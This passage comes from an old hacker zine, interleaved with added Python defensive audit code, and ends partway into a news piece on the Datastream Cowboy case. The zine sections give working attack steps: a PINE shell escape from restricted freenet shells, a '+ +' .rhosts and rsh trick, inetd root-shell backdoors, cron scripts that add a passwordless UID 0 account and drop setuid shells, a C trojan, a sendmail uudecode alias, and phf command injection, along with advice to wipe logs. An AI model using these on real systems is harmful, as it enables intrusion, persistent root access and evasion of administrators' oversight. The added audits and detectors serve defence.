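            RR(reverse_name("2.2.2.2"), "PTR", "trusted.eatme.org"),   # not peachie.com's zone
            RR("trusted.eatme.org", "A", "2.2.2.2"),                   # not peachie.com's zone
        ],
    )


def run(check_bailiwick: bool) -> Tuple[bool, int]:
    """ns.eatme.org ingests the rogue reply; returns (rlogind trusts 2.2.2.2?, records rejected)."""
    cache = Cache(check_bailiwick)
    rejected = cache.ingest(poisoned_response(), server_zone="peachie.com")
    return rlogind_would_trust(cache, "2.2.2.2", "trusted.eatme.org"), len(rejected)


if __name__ == "__main__":
    print("naive cache:     trusted=%s rejected=%d" % run(False))
    print("bailiwick check: trusted=%s rejected=%d" % run(True))
```

With the naive cache both planted records are accepted and the forward/reverse comparison passes; with the bailiwick check the two extra records are dropped, the PTR lookup misses, and the connection from 2.2.2.2 is just an unknown host.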

???????????????????????????????????????????????????????????????????????????????
5. FreeNet : TrN
???????????????????????????????????????????????????????????????????????????????

Breaking security on restricted shells and freenets.

What many system administrators fail to realize is that when they lock users
into a freenet menu environment with restricted shells and 'secure' modes on
their applications, it is almost impossible to fully examine every program.
Many programs let you escape to a shell even in secure mode, especially the
older ones. There is a longstanding bug in the gopher client, used by many
freenets, that lets you start up your own gopher server with an entry whose
selector is something like ";sh". Following this entry provides a shell.
This is the main reason the original gopher client is no longer in use.
A "l;rm -rf *" was just as easy.

In today's world the biggest problem is that freenets usually let you edit
files. If that is the case, you have almost a 100% chance of getting into a
real shell. First see if you can go through the menu system to edit a file;
if you can't, that is cool too. We are going to show you how to get a shell
out of PINE. It doesn't matter which version, this works all the way up to
3.96. Anyway, like I was saying, see if you can either a) edit a file, or
b) upload a file. I'm almost sure you can do one of the two.
So, let's start a little session here. First, you have to edit your .pinerc.
If you can't, download it (or get it from the PINE package), make the changes,
and re-upload it. What matters is that you edit the feature-list= setting
and have it read something similar to this:

feature-list=enable-alternate-editor-cmd,
enable-unix-pipe-cmd

After setting this, go further down the file until you find the editor=
setting. The comment above it tells you the alternate editor is invoked with
^_ (Control-underscore, i.e. Control-Shift-Dash on most keyboards). Do you
get the idea yet? Pine hands the draft file to that editor as its argument,
so with editor=sh your draft is run as a shell script. Set the line to read
editor=sh and save the file. Now for the fun part.
Start up pine and choose Compose Message. Erase all the To/Cc/Attchmnt/Subject
headers and make the message text blank except for the word "sh" (without
the quotes) on a line by itself. After this is done, press the alternate
editor hotkey (^_).
Here is what happens:

To :
Cc :
Attchmnt:
Subject :
----- Message Text -----
sh
$

Kinda neat. That little $ is the sign that it all worked. What you probably
want to do is execute some of the standard commands that tell you a little
about where you are:

$ uname -a ; uptime ; /sbin/ifconfig -a
SunOS pb 4.1.3_U1 1 sun4m
12:14am up 47 days, 12:18, 24 users, load average: 2.71
le0: flags=63<UP,BROADCAST,NOTRAILERS,RUNNING>
inet 199.227.192.35 ffffff00 199.227.192.0
lo0: flags=49<UP,LOOPBACK,RUNNING>
inet 127.0.0.1 ff000000

Then a w ; ps -aux would be nice. It tells you a little about what is going
on and how safe it is to do what you want. You should probably log on late at
night, compile slirp if it is only a shell/vt dialin, and then check the
system for vulnerabilities, unshadowed passwords, etc. I've notified my
freenet of their problems, but they don't seem to care. Maybe now they will.
Ok sysadmins, fix up your freenets, and hackers... Hack the planet. :-)

This article by TrN of The CodeZero. I'll have more interesting information
on the way. You can get ahold of me at http://bluebox.dyn.ml.org:8000, or by
e-mail at [email protected]. You should check out the web
page, as it has other security related information. LaterZ.

One other thing to consider: if the r-services are open (shell on port 514,
login on 513), try creating a .rhosts file in your home directory containing
"+ +" (any user, from any host), then use..

rsh -l loginhere systemhere.com csh -i

...and you will get a shell -- so1o
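An added example, not from TrN's or so1o's text nor from any r-service source, that covers both the "+ +" trick above and the +LINE column LaRCSCAN reports in section 2: a parser for .rhosts / hosts.equiv lines, an audit that flags wildcard trust, and an emulation of the ruserok(3) match so you can ask which remote host/user pairs a given file lets in. The sample file is constructed for the example; netgroup lines are parsed but not resolved, and the '-host' denial behaviour follows 4.4BSD as I remember it, so treat that detail as an assumption.

```python
from typing import List, NamedTuple, Optional


class Entry(NamedTuple):
    host: str            # hostname, "+" for any host, or "@netgroup"
    user: Optional[str]  # None = remote login must equal local login, "+" = any user
    deny: bool           # line began with "-": a matching host is refused outright


def parse_rhosts(text: str) -> List[Entry]:
    """Parse .rhosts / hosts.equiv lines of the form  [-]host [user]; '#' starts a comment."""
    entries = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        host = fields[0]
        user = fields[1] if len(fields) > 1 else None
        deny = host.startswith("-")
        if deny or host.startswith("+@"):
            host = host[1:]          # "-foo" -> "foo", "+@ng" -> "@ng"
        entries.append(Entry(host, user, deny))
    return entries


def audit(text: str) -> List[str]:
    """Flag the wildcard trust LaRCSCAN's +LINE column and the '+ +' trick depend on."""
    problems = []
    for e in parse_rhosts(text):
        if e.deny:
            continue
        if e.host == "+" and e.user == "+":
            problems.append("'+ +': any user on any host")
        elif e.host == "+":
            problems.append("'+' host wildcard for user %s" % (e.user or "<same login>"))
        elif e.user == "+":
            problems.append("any user from host %s" % e.host)
        if e.host.startswith("@"):
            problems.append("netgroup %s not evaluated" % e.host)
    return problems


def would_trust(text: str, remote_host: str, remote_user: str, local_user: str) -> bool:
    """Emulate ruserok(3) on one file: lines are tried in order and the first match decides.

    Assumption (4.4BSD behaviour as remembered, not verified here): a '-host' line that
    matches the client refuses it regardless of the user field. Netgroup lines cannot be
    resolved offline and never match.
    """
    for e in parse_rhosts(text):
        if e.host.startswith("@"):
            continue
        host_ok = e.host == "+" or e.host.lower() == remote_host.lower()
        if not host_ok:
            continue
        if e.deny:
            return False
        if e.user is None:
            user_ok = remote_user == local_user
        else:
            user_ok = e.user == "+" or e.user == remote_user
        if user_ok:
            return True
    return False


SAMPLE_RHOSTS = """\
# constructed ~victim/.rhosts for this example, not from any real host
trusted.eatme.org            # same login name only
trusted.eatme.org bob        # bob on that host may log in as victim too
-evil.example                # refuse this host no matter what follows
+ +                          # the trick from the article: anyone, from anywhere
"""


if __name__ == "__main__":
    for problem in audit(SAMPLE_RHOSTS):
        print("WARNING:", problem)
    print("anyone@anywhere ->", would_trust(SAMPLE_RHOSTS, "anywhere.example", "anyone", "victim"))
```

The audit is the LaRCSCAN-style sweep (run it over /etc/hosts.equiv and every ~/.rhosts); would_trust() is for answering the question an incident responder actually asks, namely which clients a given line would have let in.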

???????????????????????????????????????????????????????????????????????????????
6. Backdoors Revised : Blk-Majik
???????????????????????????????????????????????????????????????????????????????

Disclaimer:

If you do anything mentioned in this article, it is your own fault and any
trouble you manage to get into is your own responsibility, not mine.
But what am I thinking...like any of you lamers can root a shell :).

gr33tz:

A big wuzzup to cf, oK, oa, and gZ! Keep it kewl, madmax, imunknown, pack,
plum, mogle, crytpo`, so1o, c0d, and da rest of muh boys! Thanx to mcooly for
making this document possible and helping me out!

=============================================================================
section 1:
=============================================================================

What is a back door? :

Well, kiddies, a backdoor is just a way to remotely get into a shell without
being noticed or, sometimes, logged. One way is to add an extra listening
port on the server that drops you straight into a root shell. I will show you
a few ways to set up the port, and also how to keep it up even after the
admin finds it.
so1o had a section in a back issue with a backdoor using the inetd.conf
file where you had to end all commands with a ";". Well, that annoyed the
hell out of me, so I have modified his technique.

=============================================================================
section 2:
=============================================================================

What you need :

Basically, you need root on a shell to start (and a Unix based OS).
After that, you will need a good editor....say pico or vi. Most of you
#shells wh0res need, but lack this important ingredient....a fucking brain.

=============================================================================
section 3:
=============================================================================

Understanding the technique :

After you checked your head, editor, whoami, etc, you are all set. Ok, this
is what you look for:

/etc/services       This file maps service names to ports
/etc/inetd.conf     This is where the backdoor will be

ok, in the /etc/services file, you will see something like this:

tcpmux           1/tcp    # TCP Port Service Multiplexer
tcpmux           1/udp    # TCP Port Service Multiplexer
compressnet      2/tcp    # Management Utility
compressnet      2/udp    # Management Utility
compressnet      3/tcp    # Compression Process
compressnet      3/udp    # Compression Process

ok, what the fuck is that? ill explain it with this example:

ftp 21/tcp #File Transfer [Control]
ftp 21/udp #File Transfer [Control]

[1] [2]/[3] #[ 4 ]

1: The name of the service.
2: The port the system uses for the service.
3: The protocol, tcp or udp (we will use tcp).
4: A description of what the service is used for.

Aight, thats the service file...you will need this later.

Now look at the /etc/inetd.conf file. inetd is the Internet super-server: it
listens on every TCP and UDP port named in this file and, when a connection
request (or datagram) arrives, spawns the program listed for that service.

It will look like this:

ftp stream tcp nowait root /usr/libexec/tcpd ftpd -l -A
telnet stream tcp nowait root /usr/libexec/tcpd telnetd
shell stream tcp nowait root /usr/libexec/tcpd rshd
login stream tcp nowait root /usr/libexec/tcpd rlogind -a
exec stream tcp nowait root /usr/libexec/tcpd rexecd

let me explain it:

ftp stream tcp nowait root /usr/libexec/tcpd ftpd -l -A
[1] [ 2 ] [3] [ 4 ] [ 5 ] [ 6 ] [ 7 ]

1: Name of the service, as listed in the services file. It tells inetd what to
   look for in /etc/services to find the port to listen on.
2: Type of socket connection that the daemon will accept (stream or dgram).
3: Protocol field, which is always tcp or udp.
4: wait or nowait: whether inetd waits for the spawned server to exit before
   accepting the next connection (nowait is the norm for stream/tcp).
5: User the daemon runs as (this sets its uid/gid permissions etc.).
6: The program inetd actually executes (here the tcpd wrapper).
7: The command line handed to that program: the real daemon and its arguments.

Ok, so what that line does is make inetd listen on the ftp port (21, as
defined in the services file). It has a stream/tcp connection, doesn't wait,
runs as root, and goes through /usr/libexec/tcpd (the TCP wrapper, which
limits who may connect) before ftpd is started.

Ok, now u know what the shit is for, next step...

=============================================================================
section 4:
=============================================================================

Installing the backdoor :

Backdoor I : Using /etc/inetd.conf and /etc/services
----------------------------------------------------

method 1 :
----------

ok, now go back to the /etc/services file. Look through it and find a service
you think the admin will not notice, and that is not in use. Remember the name
of the service. Now go to the inetd.conf file, to the place with all the
service names (where the 1 is in the above example). Add your service somewhere
so it is hidden among the others. For 2, put stream. 3 is tcp, duh. 4 is
nowait. 5 will be root, so you get root access. 6 is going to be /bin/sh or
whatever shell you like. 7 is that shell's name followed by -i, e.g. if 6 is
/bin/sh, 7 is sh -i

here is an example:

ftp stream tcp nowait root /bin/sh sh -i

Ok, now you have to restart the inetd. do this by typing (as root) :

killall -HUP inetd

Ok, now lets test it. From a different system...

telnet victum.server.com 21
Trying 123.456.78.9...
Connected to comp.com
Escape character is '^]'.
bash#
bash# whoami
root
bash#

tip:

do NOT use the ftp port...it is just used too often. Pick a service that is
not used a lot. It will help you keep the backdoor running.

method 2:
---------

If you are willing, you can add your own service to the services file.
This is easy...say your services file looks like this:

netbios-ssn 139/tcp nbssn
imap 143/tcp # imap network mail protocol
NeWS 144/tcp news # Window System
snmp 161/udp

ok, look at the ports.....see how they skip a few? well, let's fill one of them
in...

netbios-ssn 139/tcp nbssn
suled 142/tcp suled
imap 143/tcp # imap network mail protocol
NeWS 144/tcp news # Window System
snmp 161/udp

Notice the suled service...that is the one I added to /etc/services.

Ok, now to the /etc/inetd.conf file:

ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a
telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd
gopher stream tcp nowait root /usr/sbin/tcpd gn

...Here we go!!

ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a
telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd
gopher stream tcp nowait root /usr/sbin/tcpd gn
suled stream tcp nowait root /bin/sh sh -i

Ok, now restart inetd as I showed before...

You're all set, telnet localhost <port u set> and test it!@~#
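
As an added defensive check (this is not code from the zine), here is a small Python audit that parses /etc/services and /etc/inetd.conf text in the format explained above and flags entries that hand a connection straight to a shell, or that name a service inetd cannot find in /etc/services. The sample fragments and the function names are constructed for the example.

```python
# Constructed sample fragments (not copied from any real host) in the same
# layout as the /etc/services and /etc/inetd.conf excerpts above.
SERVICES_SAMPLE = """\
ftp             21/tcp          #File Transfer [Control]
telnet          23/tcp
netbios-ssn     139/tcp         nbssn
suled           142/tcp         suled
imap            143/tcp         # imap network mail protocol
"""

INETD_SAMPLE = """\
# inetd.conf
ftp     stream  tcp  nowait  root  /bin/sh         sh -i
telnet  stream  tcp  nowait  root  /usr/sbin/tcpd  in.telnetd
suled   stream  tcp  nowait  root  /bin/sh         sh -i
imap    stream  tcp  nowait  root  /usr/sbin/tcpd  imapd
bogus   stream  tcp  nowait  root  /usr/sbin/tcpd  in.bogusd
"""

# Interpreters that have no business being the server program of an inetd entry.
SHELLS = {"sh", "csh", "bash", "ksh", "tcsh", "zsh", "perl", "python"}


def parse_services(text):
    """Return {(name, proto): port} from /etc/services-style text, aliases included."""
    table = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        fields = line.split()
        if len(fields) < 2 or "/" not in fields[1]:
            continue
        port, proto = fields[1].split("/", 1)
        for name in [fields[0]] + fields[2:]:  # primary name plus aliases
            table[(name, proto)] = int(port)
    return table


def audit_inetd(inetd_text, services_text):
    """Return (lineno, service, port, reason) for suspicious inetd.conf entries.

    reason is one of:
      "shell-as-server"         the server program or its argv[0] is a shell
      "service-not-in-services" inetd could not map the name to a port
    """
    services = parse_services(services_text)
    findings = []
    for lineno, raw in enumerate(inetd_text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        if len(fields) < 6:
            continue                           # not a complete inetd entry
        name, _socktype, proto, _wait, _user, program = fields[:6]
        args = fields[6:]
        port = services.get((name, proto))     # the port inetd would bind
        if port is None:
            findings.append((lineno, name, None, "service-not-in-services"))
        program_base = program.rsplit("/", 1)[-1]
        arg0_base = args[0].rsplit("/", 1)[-1] if args else ""
        if program_base in SHELLS or arg0_base in SHELLS:
            findings.append((lineno, name, port, "shell-as-server"))
    return findings


if __name__ == "__main__":
    for lineno, name, port, reason in audit_inetd(INETD_SAMPLE, SERVICES_SAMPLE):
        print("inetd.conf line %d: %s (port %s): %s" % (lineno, name, port, reason))
```

Every flagged port is worth cross-checking against what is actually listening (netstat) and against the wrapper's hosts.allow/hosts.deny, since a shell-as-server entry bypasses both the real daemon and its logging.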

Backdoor II: Da beauty of CRON
-------------------------------

Ok, cron trojans are good for keeping root if the admin kills the backdoor.
cron is a time-based daemon: each crontab entry gives a minute, hour, etc.,
and cron makes the system run the command automatically at the time of your
choice... Type crontab in the shell. It will tell you how to list, install
and remove crontabs. You will want to look at /var/spool/cron/crontabs/root.
This is what the entries will look like:

0 0 * * 1 /usr/bin/updatedb
[1] [2] [3] [4] [5] [ 6 ]

1: minute, 0-59
2: hour, 0-23
3: day of month, 1-31
4: month of year, 1-12
5: day of week, 0-6 (0 is Sunday)
6: command to execute

The example above runs at midnight on Mondays. If you want to exploit cron,
simply add a cron line to /var/spool/cron/crontabs/root.

ie: If you use the UID 0 account (shown below), you can make a cron job to
check whether the UID 0 account is still alive. If root killed it, the cron
job can re-add it!

...This will make the UID 0 account, just for back-up:

Cron #1
-------

newuser.sh
----------

#!/bin/csh
# Inserts a UID 0 account into the middle of the passwd file.
# There is likely a way to do this in 1/2 a line of AWK or SED. Oh well.
# [email protected]

set linecount = `wc -l /etc/passwd`
cd # Do this at home.
cp /etc/passwd ./temppass # Safety first.
echo passwd file has $linecount[1] lines.
@ linecount[1] /= 2
@ linecount[1] += 1 # we only want 2 temp files
echo Creating two files, $linecount[1] lines each \(or approximately that\).
split -$linecount[1] ./temppass # passwd string optional
echo "YourUser::0:0:Mr. Hacker:/home/hacker:/bin/csh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd # or whatever it was beforehand
rm ./xa* ./temppass
echo Done...

*** NOTE : MODIFY THE ECHO "YOURUSER..." PART!!

Here is a script that gets you the same thing a different way: instead of
making a new account, it leaves a setuid-root copy of csh lying around for you:

dead.sh
-------

#!/bin/sh
# Everyone's favorite...

cp /bin/csh /tmp/.yourlittleshell # Don't name it that...
chmod 4755 /tmp/.yourlittleshell

Ok, here is where the cron comes in. It looks in the passwd file to check
whether YourUser is still alive. If not, it brings him back!

revive.sh
---------

#!/bin/csh
# Is YourUser still on the system? Let's make sure he is.
# [email protected]

set evilflag = (`grep YourUser /etc/passwd`)

if($#evilflag == 0) then # Is he there?

set linecount = `wc -l /etc/passwd`
cd # Do this at home.
cp /etc/passwd ./temppass # Safety first.
@ linecount[1] /= 2
@ linecount[1] += 1 # we only want 2 temp files
split -$linecount[1] ./temppass # passwd string option
echo "YourUser::0:0:Mr. Hacker:/home/hacker:/bin/csh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd # or whatever it was beforehand
rm ./xa* ./temppass
echo Done...
else
endif

cron #2
-------

First of all, you will need a copy of the /etc/passwd file in a hidden
location. For this example, we will use /var/spool/mail/.hidden. It has
one entry in it, which will be the root account we use. Then let's make a
cron job that saves a copy of the real /etc/passwd file and installs the hidden
passwd file as the real one for 1 minute at a time of your choice. Make it
a slow time of day, because anyone who tries to access the passwd file
during this minute will get an error. 4:30 am is a good time. Put this in
root's crontab to do this:

29 4 * * * /bin/usr/hidenhidenpass

...make sure this exists:

#echo "root:1234567890123:0:0:Operator:/:/bin/csh" > /var/spool/mail/.hidden

here is the /bin/usr/hidenhidenpass

.hidden
-------

#!/bin/sh
# Install trojan /etc/passwd file for one minute
#[email protected]
cp /etc/passwd /etc/.temppass
cp /var/spool/mail/.hidden /etc/passwd
sleep 60
mv /etc/.temppass /etc/passwd

Cron #3
--------

This is a C program that works like the one above. Cron it as root as shown
above and just let it run every day.

hidden.c
--------

#include <stdio.h>
#include <stdlib.h>   /* system() */
#include <string.h>   /* strcmp() */
#include <unistd.h>   /* sleep() */

#define KEYWORD "industry3"

int main(int argc, char *argv[])
{
    int i = 0;

    if (argc > 1) { /* we've got an argument, is it the keyword? */
        if (!strcmp(KEYWORD, argv[1])) {
            /* This is the trojan part. */
            system("cp /bin/csh /bin/.swp121");
            system("chown root /bin/.swp121");
            system("chmod 4755 /bin/.swp121");
        }
    }
    /* Put your possibly system specific trojan messages here */
    /* Let's look like we're doing something... */
    printf("Synchronizing bitmap image records.");
    fflush(stdout); /* push the message out before the dots start */
    /* system("ls -alR / >& /dev/null > /dev/null&"); */
    for (; i < 10; i++) {
        fprintf(stderr, ".");
        sleep(1);
    }
    printf("\nDone.\n");
    return 0;
} /* End main */
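
As an added defensive counterpart to the cron section (not code from the zine), here is a Python audit for the two things the scripts above leave behind: passwd entries with a second UID 0 or an empty password field, and root crontab commands living under hidden dotfile paths or outside the normal system directories. The sample passwd and crontab text and the function names are constructed for the example.

```python
import os

# Constructed samples (not from a real host): a passwd file with the kind of
# entry newuser.sh inserts, and a root crontab with the jobs described above.
PASSWD_SAMPLE = """\
root:x:0:0:Operator:/:/bin/csh
daemon:*:1:1::/:/sbin/nologin
YourUser::0:0:Mr. Hacker:/home/hacker:/bin/csh
alice:x:1001:100:Alice:/home/alice:/bin/sh
"""

CRONTAB_SAMPLE = """\
0 0 * * 1 /usr/bin/updatedb
29 4 * * * /bin/usr/hidenhidenpass
15 3 * * * /bin/.swp121 industry3
"""

# Directories from which root cron jobs are normally run.
SYSTEM_BIN_DIRS = {"/bin", "/sbin", "/usr/bin", "/usr/sbin", "/usr/libexec",
                   "/usr/local/bin", "/usr/local/sbin", "/etc"}


def audit_passwd(text):
    """Return (lineno, user, reason) for passwd entries an admin should look at."""
    findings = []
    seen = set()
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:                     # passwd(5) has exactly 7 fields
            findings.append((lineno, fields[0], "malformed"))
            continue
        user, passwd, uid, _gid, _gecos, _home, _shell = fields
        if user in seen:
            findings.append((lineno, user, "duplicate-user"))
        seen.add(user)
        if uid == "0" and user != "root":        # a second superuser account
            findings.append((lineno, user, "extra-uid0"))
        if passwd == "":                         # no password at all
            findings.append((lineno, user, "empty-password"))
    return findings


def audit_crontab(text):
    """Return (lineno, command, reason) for crontab lines with odd program paths."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue
        fields = line.split(None, 5)             # 5 time fields, then the command
        if len(fields) < 6:
            continue                             # env lines, @reboot forms, blanks
        command = fields[5]
        program = command.split()[0]
        if not program.startswith("/"):
            continue                             # relative name, resolved via PATH
        hidden = any(p.startswith(".") for p in program.split("/")[1:])
        if hidden:                               # e.g. /bin/.swp121
            findings.append((lineno, command, "hidden-path"))
        elif os.path.dirname(program) not in SYSTEM_BIN_DIRS:
            findings.append((lineno, command, "unusual-dir"))
    return findings


if __name__ == "__main__":
    for lineno, user, reason in audit_passwd(PASSWD_SAMPLE):
        print("passwd line %d: %s: %s" % (lineno, user, reason))
    for lineno, command, reason in audit_crontab(CRONTAB_SAMPLE):
        print("crontab line %d: %s: %s" % (lineno, command, reason))
```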

=============================================================================
section 5:
=============================================================================

Sendmail backdoor :
-------------------

With this, you have to edit the /etc/aliases file. Add this line:

decode: |/usr/bin/uudecode

make sure you hide it in there so it isn't obvious :). The file you mail to be
uudecoded will be a .rhosts file with its full pathname embedded in the
uuencode header, so uudecode writes it straight to that path.

here is the script:

uudecode.sh
-----------

#!/bin/sh
# Create our .rhosts file. Note this will output to stdout.

echo "+ +" > tmpfile
/usr/bin/uuencode tmpfile /root/.rhosts

Ok, now telnet to victumserver.com at port 25. Fake mail to decode and use the
uuencoded version of the .rhosts file as the message body. Here is an easy
way (but not fake):

echo "+ +" | /usr/bin/uuencode /root/.rhosts | mail [email protected]

You can add any program that I have listed to be run from the alias, so be as
creative as you want! :)
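
As an added defensive check for this section (not code from the zine), here is a Python audit that flags /etc/aliases entries which pipe mail into a program, with uudecode called out specially, and .rhosts entries that trust any host or any user. The sample aliases and .rhosts text and the function names are constructed for the example.

```python
# Constructed samples (not from a real host): an aliases file carrying the
# decode alias described above, and a .rhosts file with the "+ +" line.
ALIASES_SAMPLE = """\
# Basic system aliases
postmaster: root
MAILER-DAEMON: postmaster
decode: |/usr/bin/uudecode
owner-list: "|/usr/local/bin/majordomo -l list"
"""

RHOSTS_SAMPLE = """\
+ +
trusted.example.com alice
"""


def audit_aliases(text):
    """Return (lineno, alias, program, reason) for aliases that run a program.

    reason is "uudecode-alias" when the program is uudecode (mail can then
    write arbitrary files as the mailer's user) and "program-alias" otherwise.
    """
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        s = line.strip()
        if not s or s.startswith("#") or ":" not in s:
            continue                                  # comment or continuation
        name, targets = s.split(":", 1)
        for target in targets.split(","):
            t = target.strip().strip('"')             # quoted "|prog args" form
            if not t.startswith("|"):
                continue
            program = t[1:].strip().split()[0]
            reason = "uudecode-alias" if program.endswith("uudecode") else "program-alias"
            findings.append((lineno, name.strip(), program, reason))
    return findings


def audit_rhosts(text):
    """Return (lineno, reason) for .rhosts lines that trust any host or any user."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        fields = line.split()
        if not fields or fields[0].startswith("#"):
            continue
        host = fields[0]
        user = fields[1] if len(fields) > 1 else None
        if host == "+" or user == "+":                # "+" is the rhosts wildcard
            findings.append((lineno, "wildcard-trust"))
    return findings


if __name__ == "__main__":
    for lineno, alias, program, reason in audit_aliases(ALIASES_SAMPLE):
        print("aliases line %d: %s -> %s: %s" % (lineno, alias, program, reason))
    for lineno, reason in audit_rhosts(RHOSTS_SAMPLE):
        print(".rhosts line %d: %s" % (lineno, reason))
```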

=============================================================================
section 6:
=============================================================================

Others :

Here is one of the best trojans I have seen. It is sneaky and only detectable
by programs like tripwire. All you have to do is put the trojan code into the
source of some popular system programs. su, login, and passwd are very
good to add it to because they run SUID root and don't have strict
permissions, so you can modify them. This will tell you what to do after you
get the source code for the particular UNIX system you are backdooring. If you
can't get the source for any programs on your system, you may be screwed :(.
You can find trojaned versions of many programs; here is a small example
of the pseudo-code that gets added to such programs...

get input;
if input is special hardcoded flag, spawn evil trojan;
else if input is valid, continue;
else quit with error;
...

=============================================================================
section 7:
=============================================================================

Keeping the backdoor :

Well, the best advice I can possibly give to start off is to cover your
tracks. If the admin doesn't know he's been hacked, he won't look for
backdoors to remove. This will totally depend on the admin's ability to find
backdoors and know how to get rid of them.

???????????????????????????????????????????????????????????????????????????????
7. One Last Thing About The Infamous pHf Technique : so1o
???????????????????????????????????????????????????????????????????????????????

You can use this basic form of attack...[Thru NutScrape For Example]

http://www.site.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
[ 1 ][ 2 ][ 3 ][ 4 ][5][ 6 ]

1: The Target Site.
2: The pHf Command.
3: The Magic pHf Arguments.
4: The Program You Wish To Run.
5: %20 Is A Space, so %20%20%20 == 3 Spaces.
6: The Arguments You Wish To Use.

Here Are Some Other Examples...
-------------------------------

http://www.site.com/cgi-bin/phf?Qalias=x%0a/bin/ls%20-la%20/etc/

...This will list the files in the /etc/ directory.

http://www.site.com/cgi-bin/phf?Qalias=x%0a/bin/uname%20-a

...This will display the operating system.

Remember : You execute the commands with pHf as the user nobody, so you can't
           shut down the system, echo "+ +" >> /.rhosts etc. etc. All the
           stuff you throw at the system using phf will be logged too, so
           if you do decide to hack the system, remember to kill the logs
           when you get root :)
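
Since the text notes that every phf request is logged, here is an added detection example (not from the zine) that reads Common Log Format access-log lines and reports requests to phf whose query string carries the %0a newline injection, together with the command that was appended after it. The log lines and the function name are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines in Common Log Format (not from a real server).
ACCESS_LOG_SAMPLE = """\
10.0.0.5 - - [15/Jul/1997:04:31:02 -0400] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 1324
10.0.0.7 - - [15/Jul/1997:04:32:10 -0400] "GET /index.html HTTP/1.0" 200 512
10.0.0.5 - - [15/Jul/1997:04:33:44 -0400] "GET /cgi-bin/phf?Qalias=x%0a/bin/ls%20-la%20/etc/ HTTP/1.0" 200 88
10.0.0.9 - - [15/Jul/1997:04:35:00 -0400] "GET /cgi-bin/phf?Qname=smith HTTP/1.0" 200 240
"""

# client, timestamp, method, request target, status
CLF_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')


def detect_phf(log_text):
    """Return (client, injected_command, timestamp) for each phf newline injection.

    A legitimate phf lookup (Qname=smith) has no newline in any value and is
    not reported; the %0a form is decoded by parse_qsl into a real newline,
    and everything after that newline is the shell command phf would run.
    """
    hits = []
    for line in log_text.splitlines():
        m = CLF_RE.match(line)
        if not m:
            continue
        client, stamp, _method, target, _status = m.groups()
        url = urlsplit(target)
        if url.path.rsplit("/", 1)[-1] != "phf":
            continue
        for _name, value in parse_qsl(url.query, keep_blank_values=True):
            if "\n" in value:
                injected = " ".join(value.split("\n")[1:]).strip()
                hits.append((client, injected, stamp))
    return hits


if __name__ == "__main__":
    for client, injected, stamp in detect_phf(ACCESS_LOG_SAMPLE):
        print("%s %s ran via phf: %s" % (stamp, client, injected))
```

Because the injection is the literal newline inside the argument, the same check works whether the attacker used %0a, %0A, or a url-encoded carriage return followed by it.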

???????????????????????????????????????????????????????????????????????????????
===============================================================================
==[ NEWS ]=====================[ .SECTION E. ]=======================[ NEWS ]==
===============================================================================
???????????????????????????????????????????????????????????????????????????????
1. Some History : nobody
???????????????????????????????????????????????????????????????????????????????

Electronic doom will soon be visited on U.S. computer networks by
information warriors, hackers, pannational groups of computer-wielding
religious extremists, possible agents of Libya and Iran, international
thugs and money-mad Internet savvy thieves.

John Deutch, director of Central Intelligence, testified to the
truth of the matter, so it must be graven in stone. In a long statement
composed in the august tone of the Cold Warrior, Deutch said to the
Senate Permanent Subcommittee on Investigations on June 25, "My greatest
concern is that hackers, terrorist organizations, or other nations might
use information warfare techniques" to disrupt the national
infrastructure.

The lack of solid evidence for any of the claims made by the intelligence
community has created an unusual stage on which two British hackers,
Datastream Cowboy and Kuji, were made the dog and pony in a ridiculous
show to demonstrate the threat of information warfare to members of
Congress. Because of a break-in at an Air Force facility in Rome, NY,
in 1994, both hackers were made the stars of two Government Accounting
Office reports on network intrusions in the Department of Defense earlier
this year. The comings and goings of Datastream Cowboy also constitute the
meat of Gelber and Christy's minority staff report from the Subcommittee on
Investigations.

Before delving into it in detail, it's interesting to read what a
British newspaper published about Datastream Cowboy, a sixteen year-old,
about a year before he was made the poster boy for information
warfare and international hacking conspiracies in front of Congress.

In a brief article, blessedly so in contrast to the reams of propaganda
published on the incident for Congress, the July 5 1995 edition of The
Independent wrote, "[Datastream Cowboy] appeared before Bow Street
magistrates yesterday charged with unlawfully gaining access to a series
of American defense computers. Richard Pryce, who was 16 at the time of
the alleged offences, is accused of accessing key US Air Force systems
and a network owned by Lockheed, the missile and aircraft manufacturers."

Pryce, a resident of a northwest suburb of London did not enter a plea
on any of 12 charges levied against him under the British
Computer Misuse Act. He was arrested on May 12, 1994, by New Scotland
Yard as a result of work by the U.S. Air Force Office of Special
Investigations. The Times of London reported when police came for
Pryce, they found him at his PC on the third floor of his family's house.
Knowing he was about to be arrested, he "curled up on the floor and cried."

In Gelber and Christy's staff report, the tracking of Pryce, and to a
lesser extent a collaborator called Kuji -- real name Mathew Bevan, is
retold as an eight page appendix entitled "The Case Study: Rome
Laboratory, Griffiss Air Force Base, NY Intrusion."

Pryce's entry into Air Force computers was noticed on March 28, 1994,
when personnel discovered a sniffer program he had installed on one
of the Air Force systems in Rome. The Defense Information System
Agency (DISA) was notified. DISA subsequently called the Air
Force Office of Special Investigations (AFOSI) at the Air Force
Information Warfare Center in San Antonio, Texas. AFOSI then
sent a team to Rome to appraise the break-in, secure the system and
trace those responsible. During the process, the AFOSI team discovered
Datastream Cowboy had entered the Rome Air Force computers for the
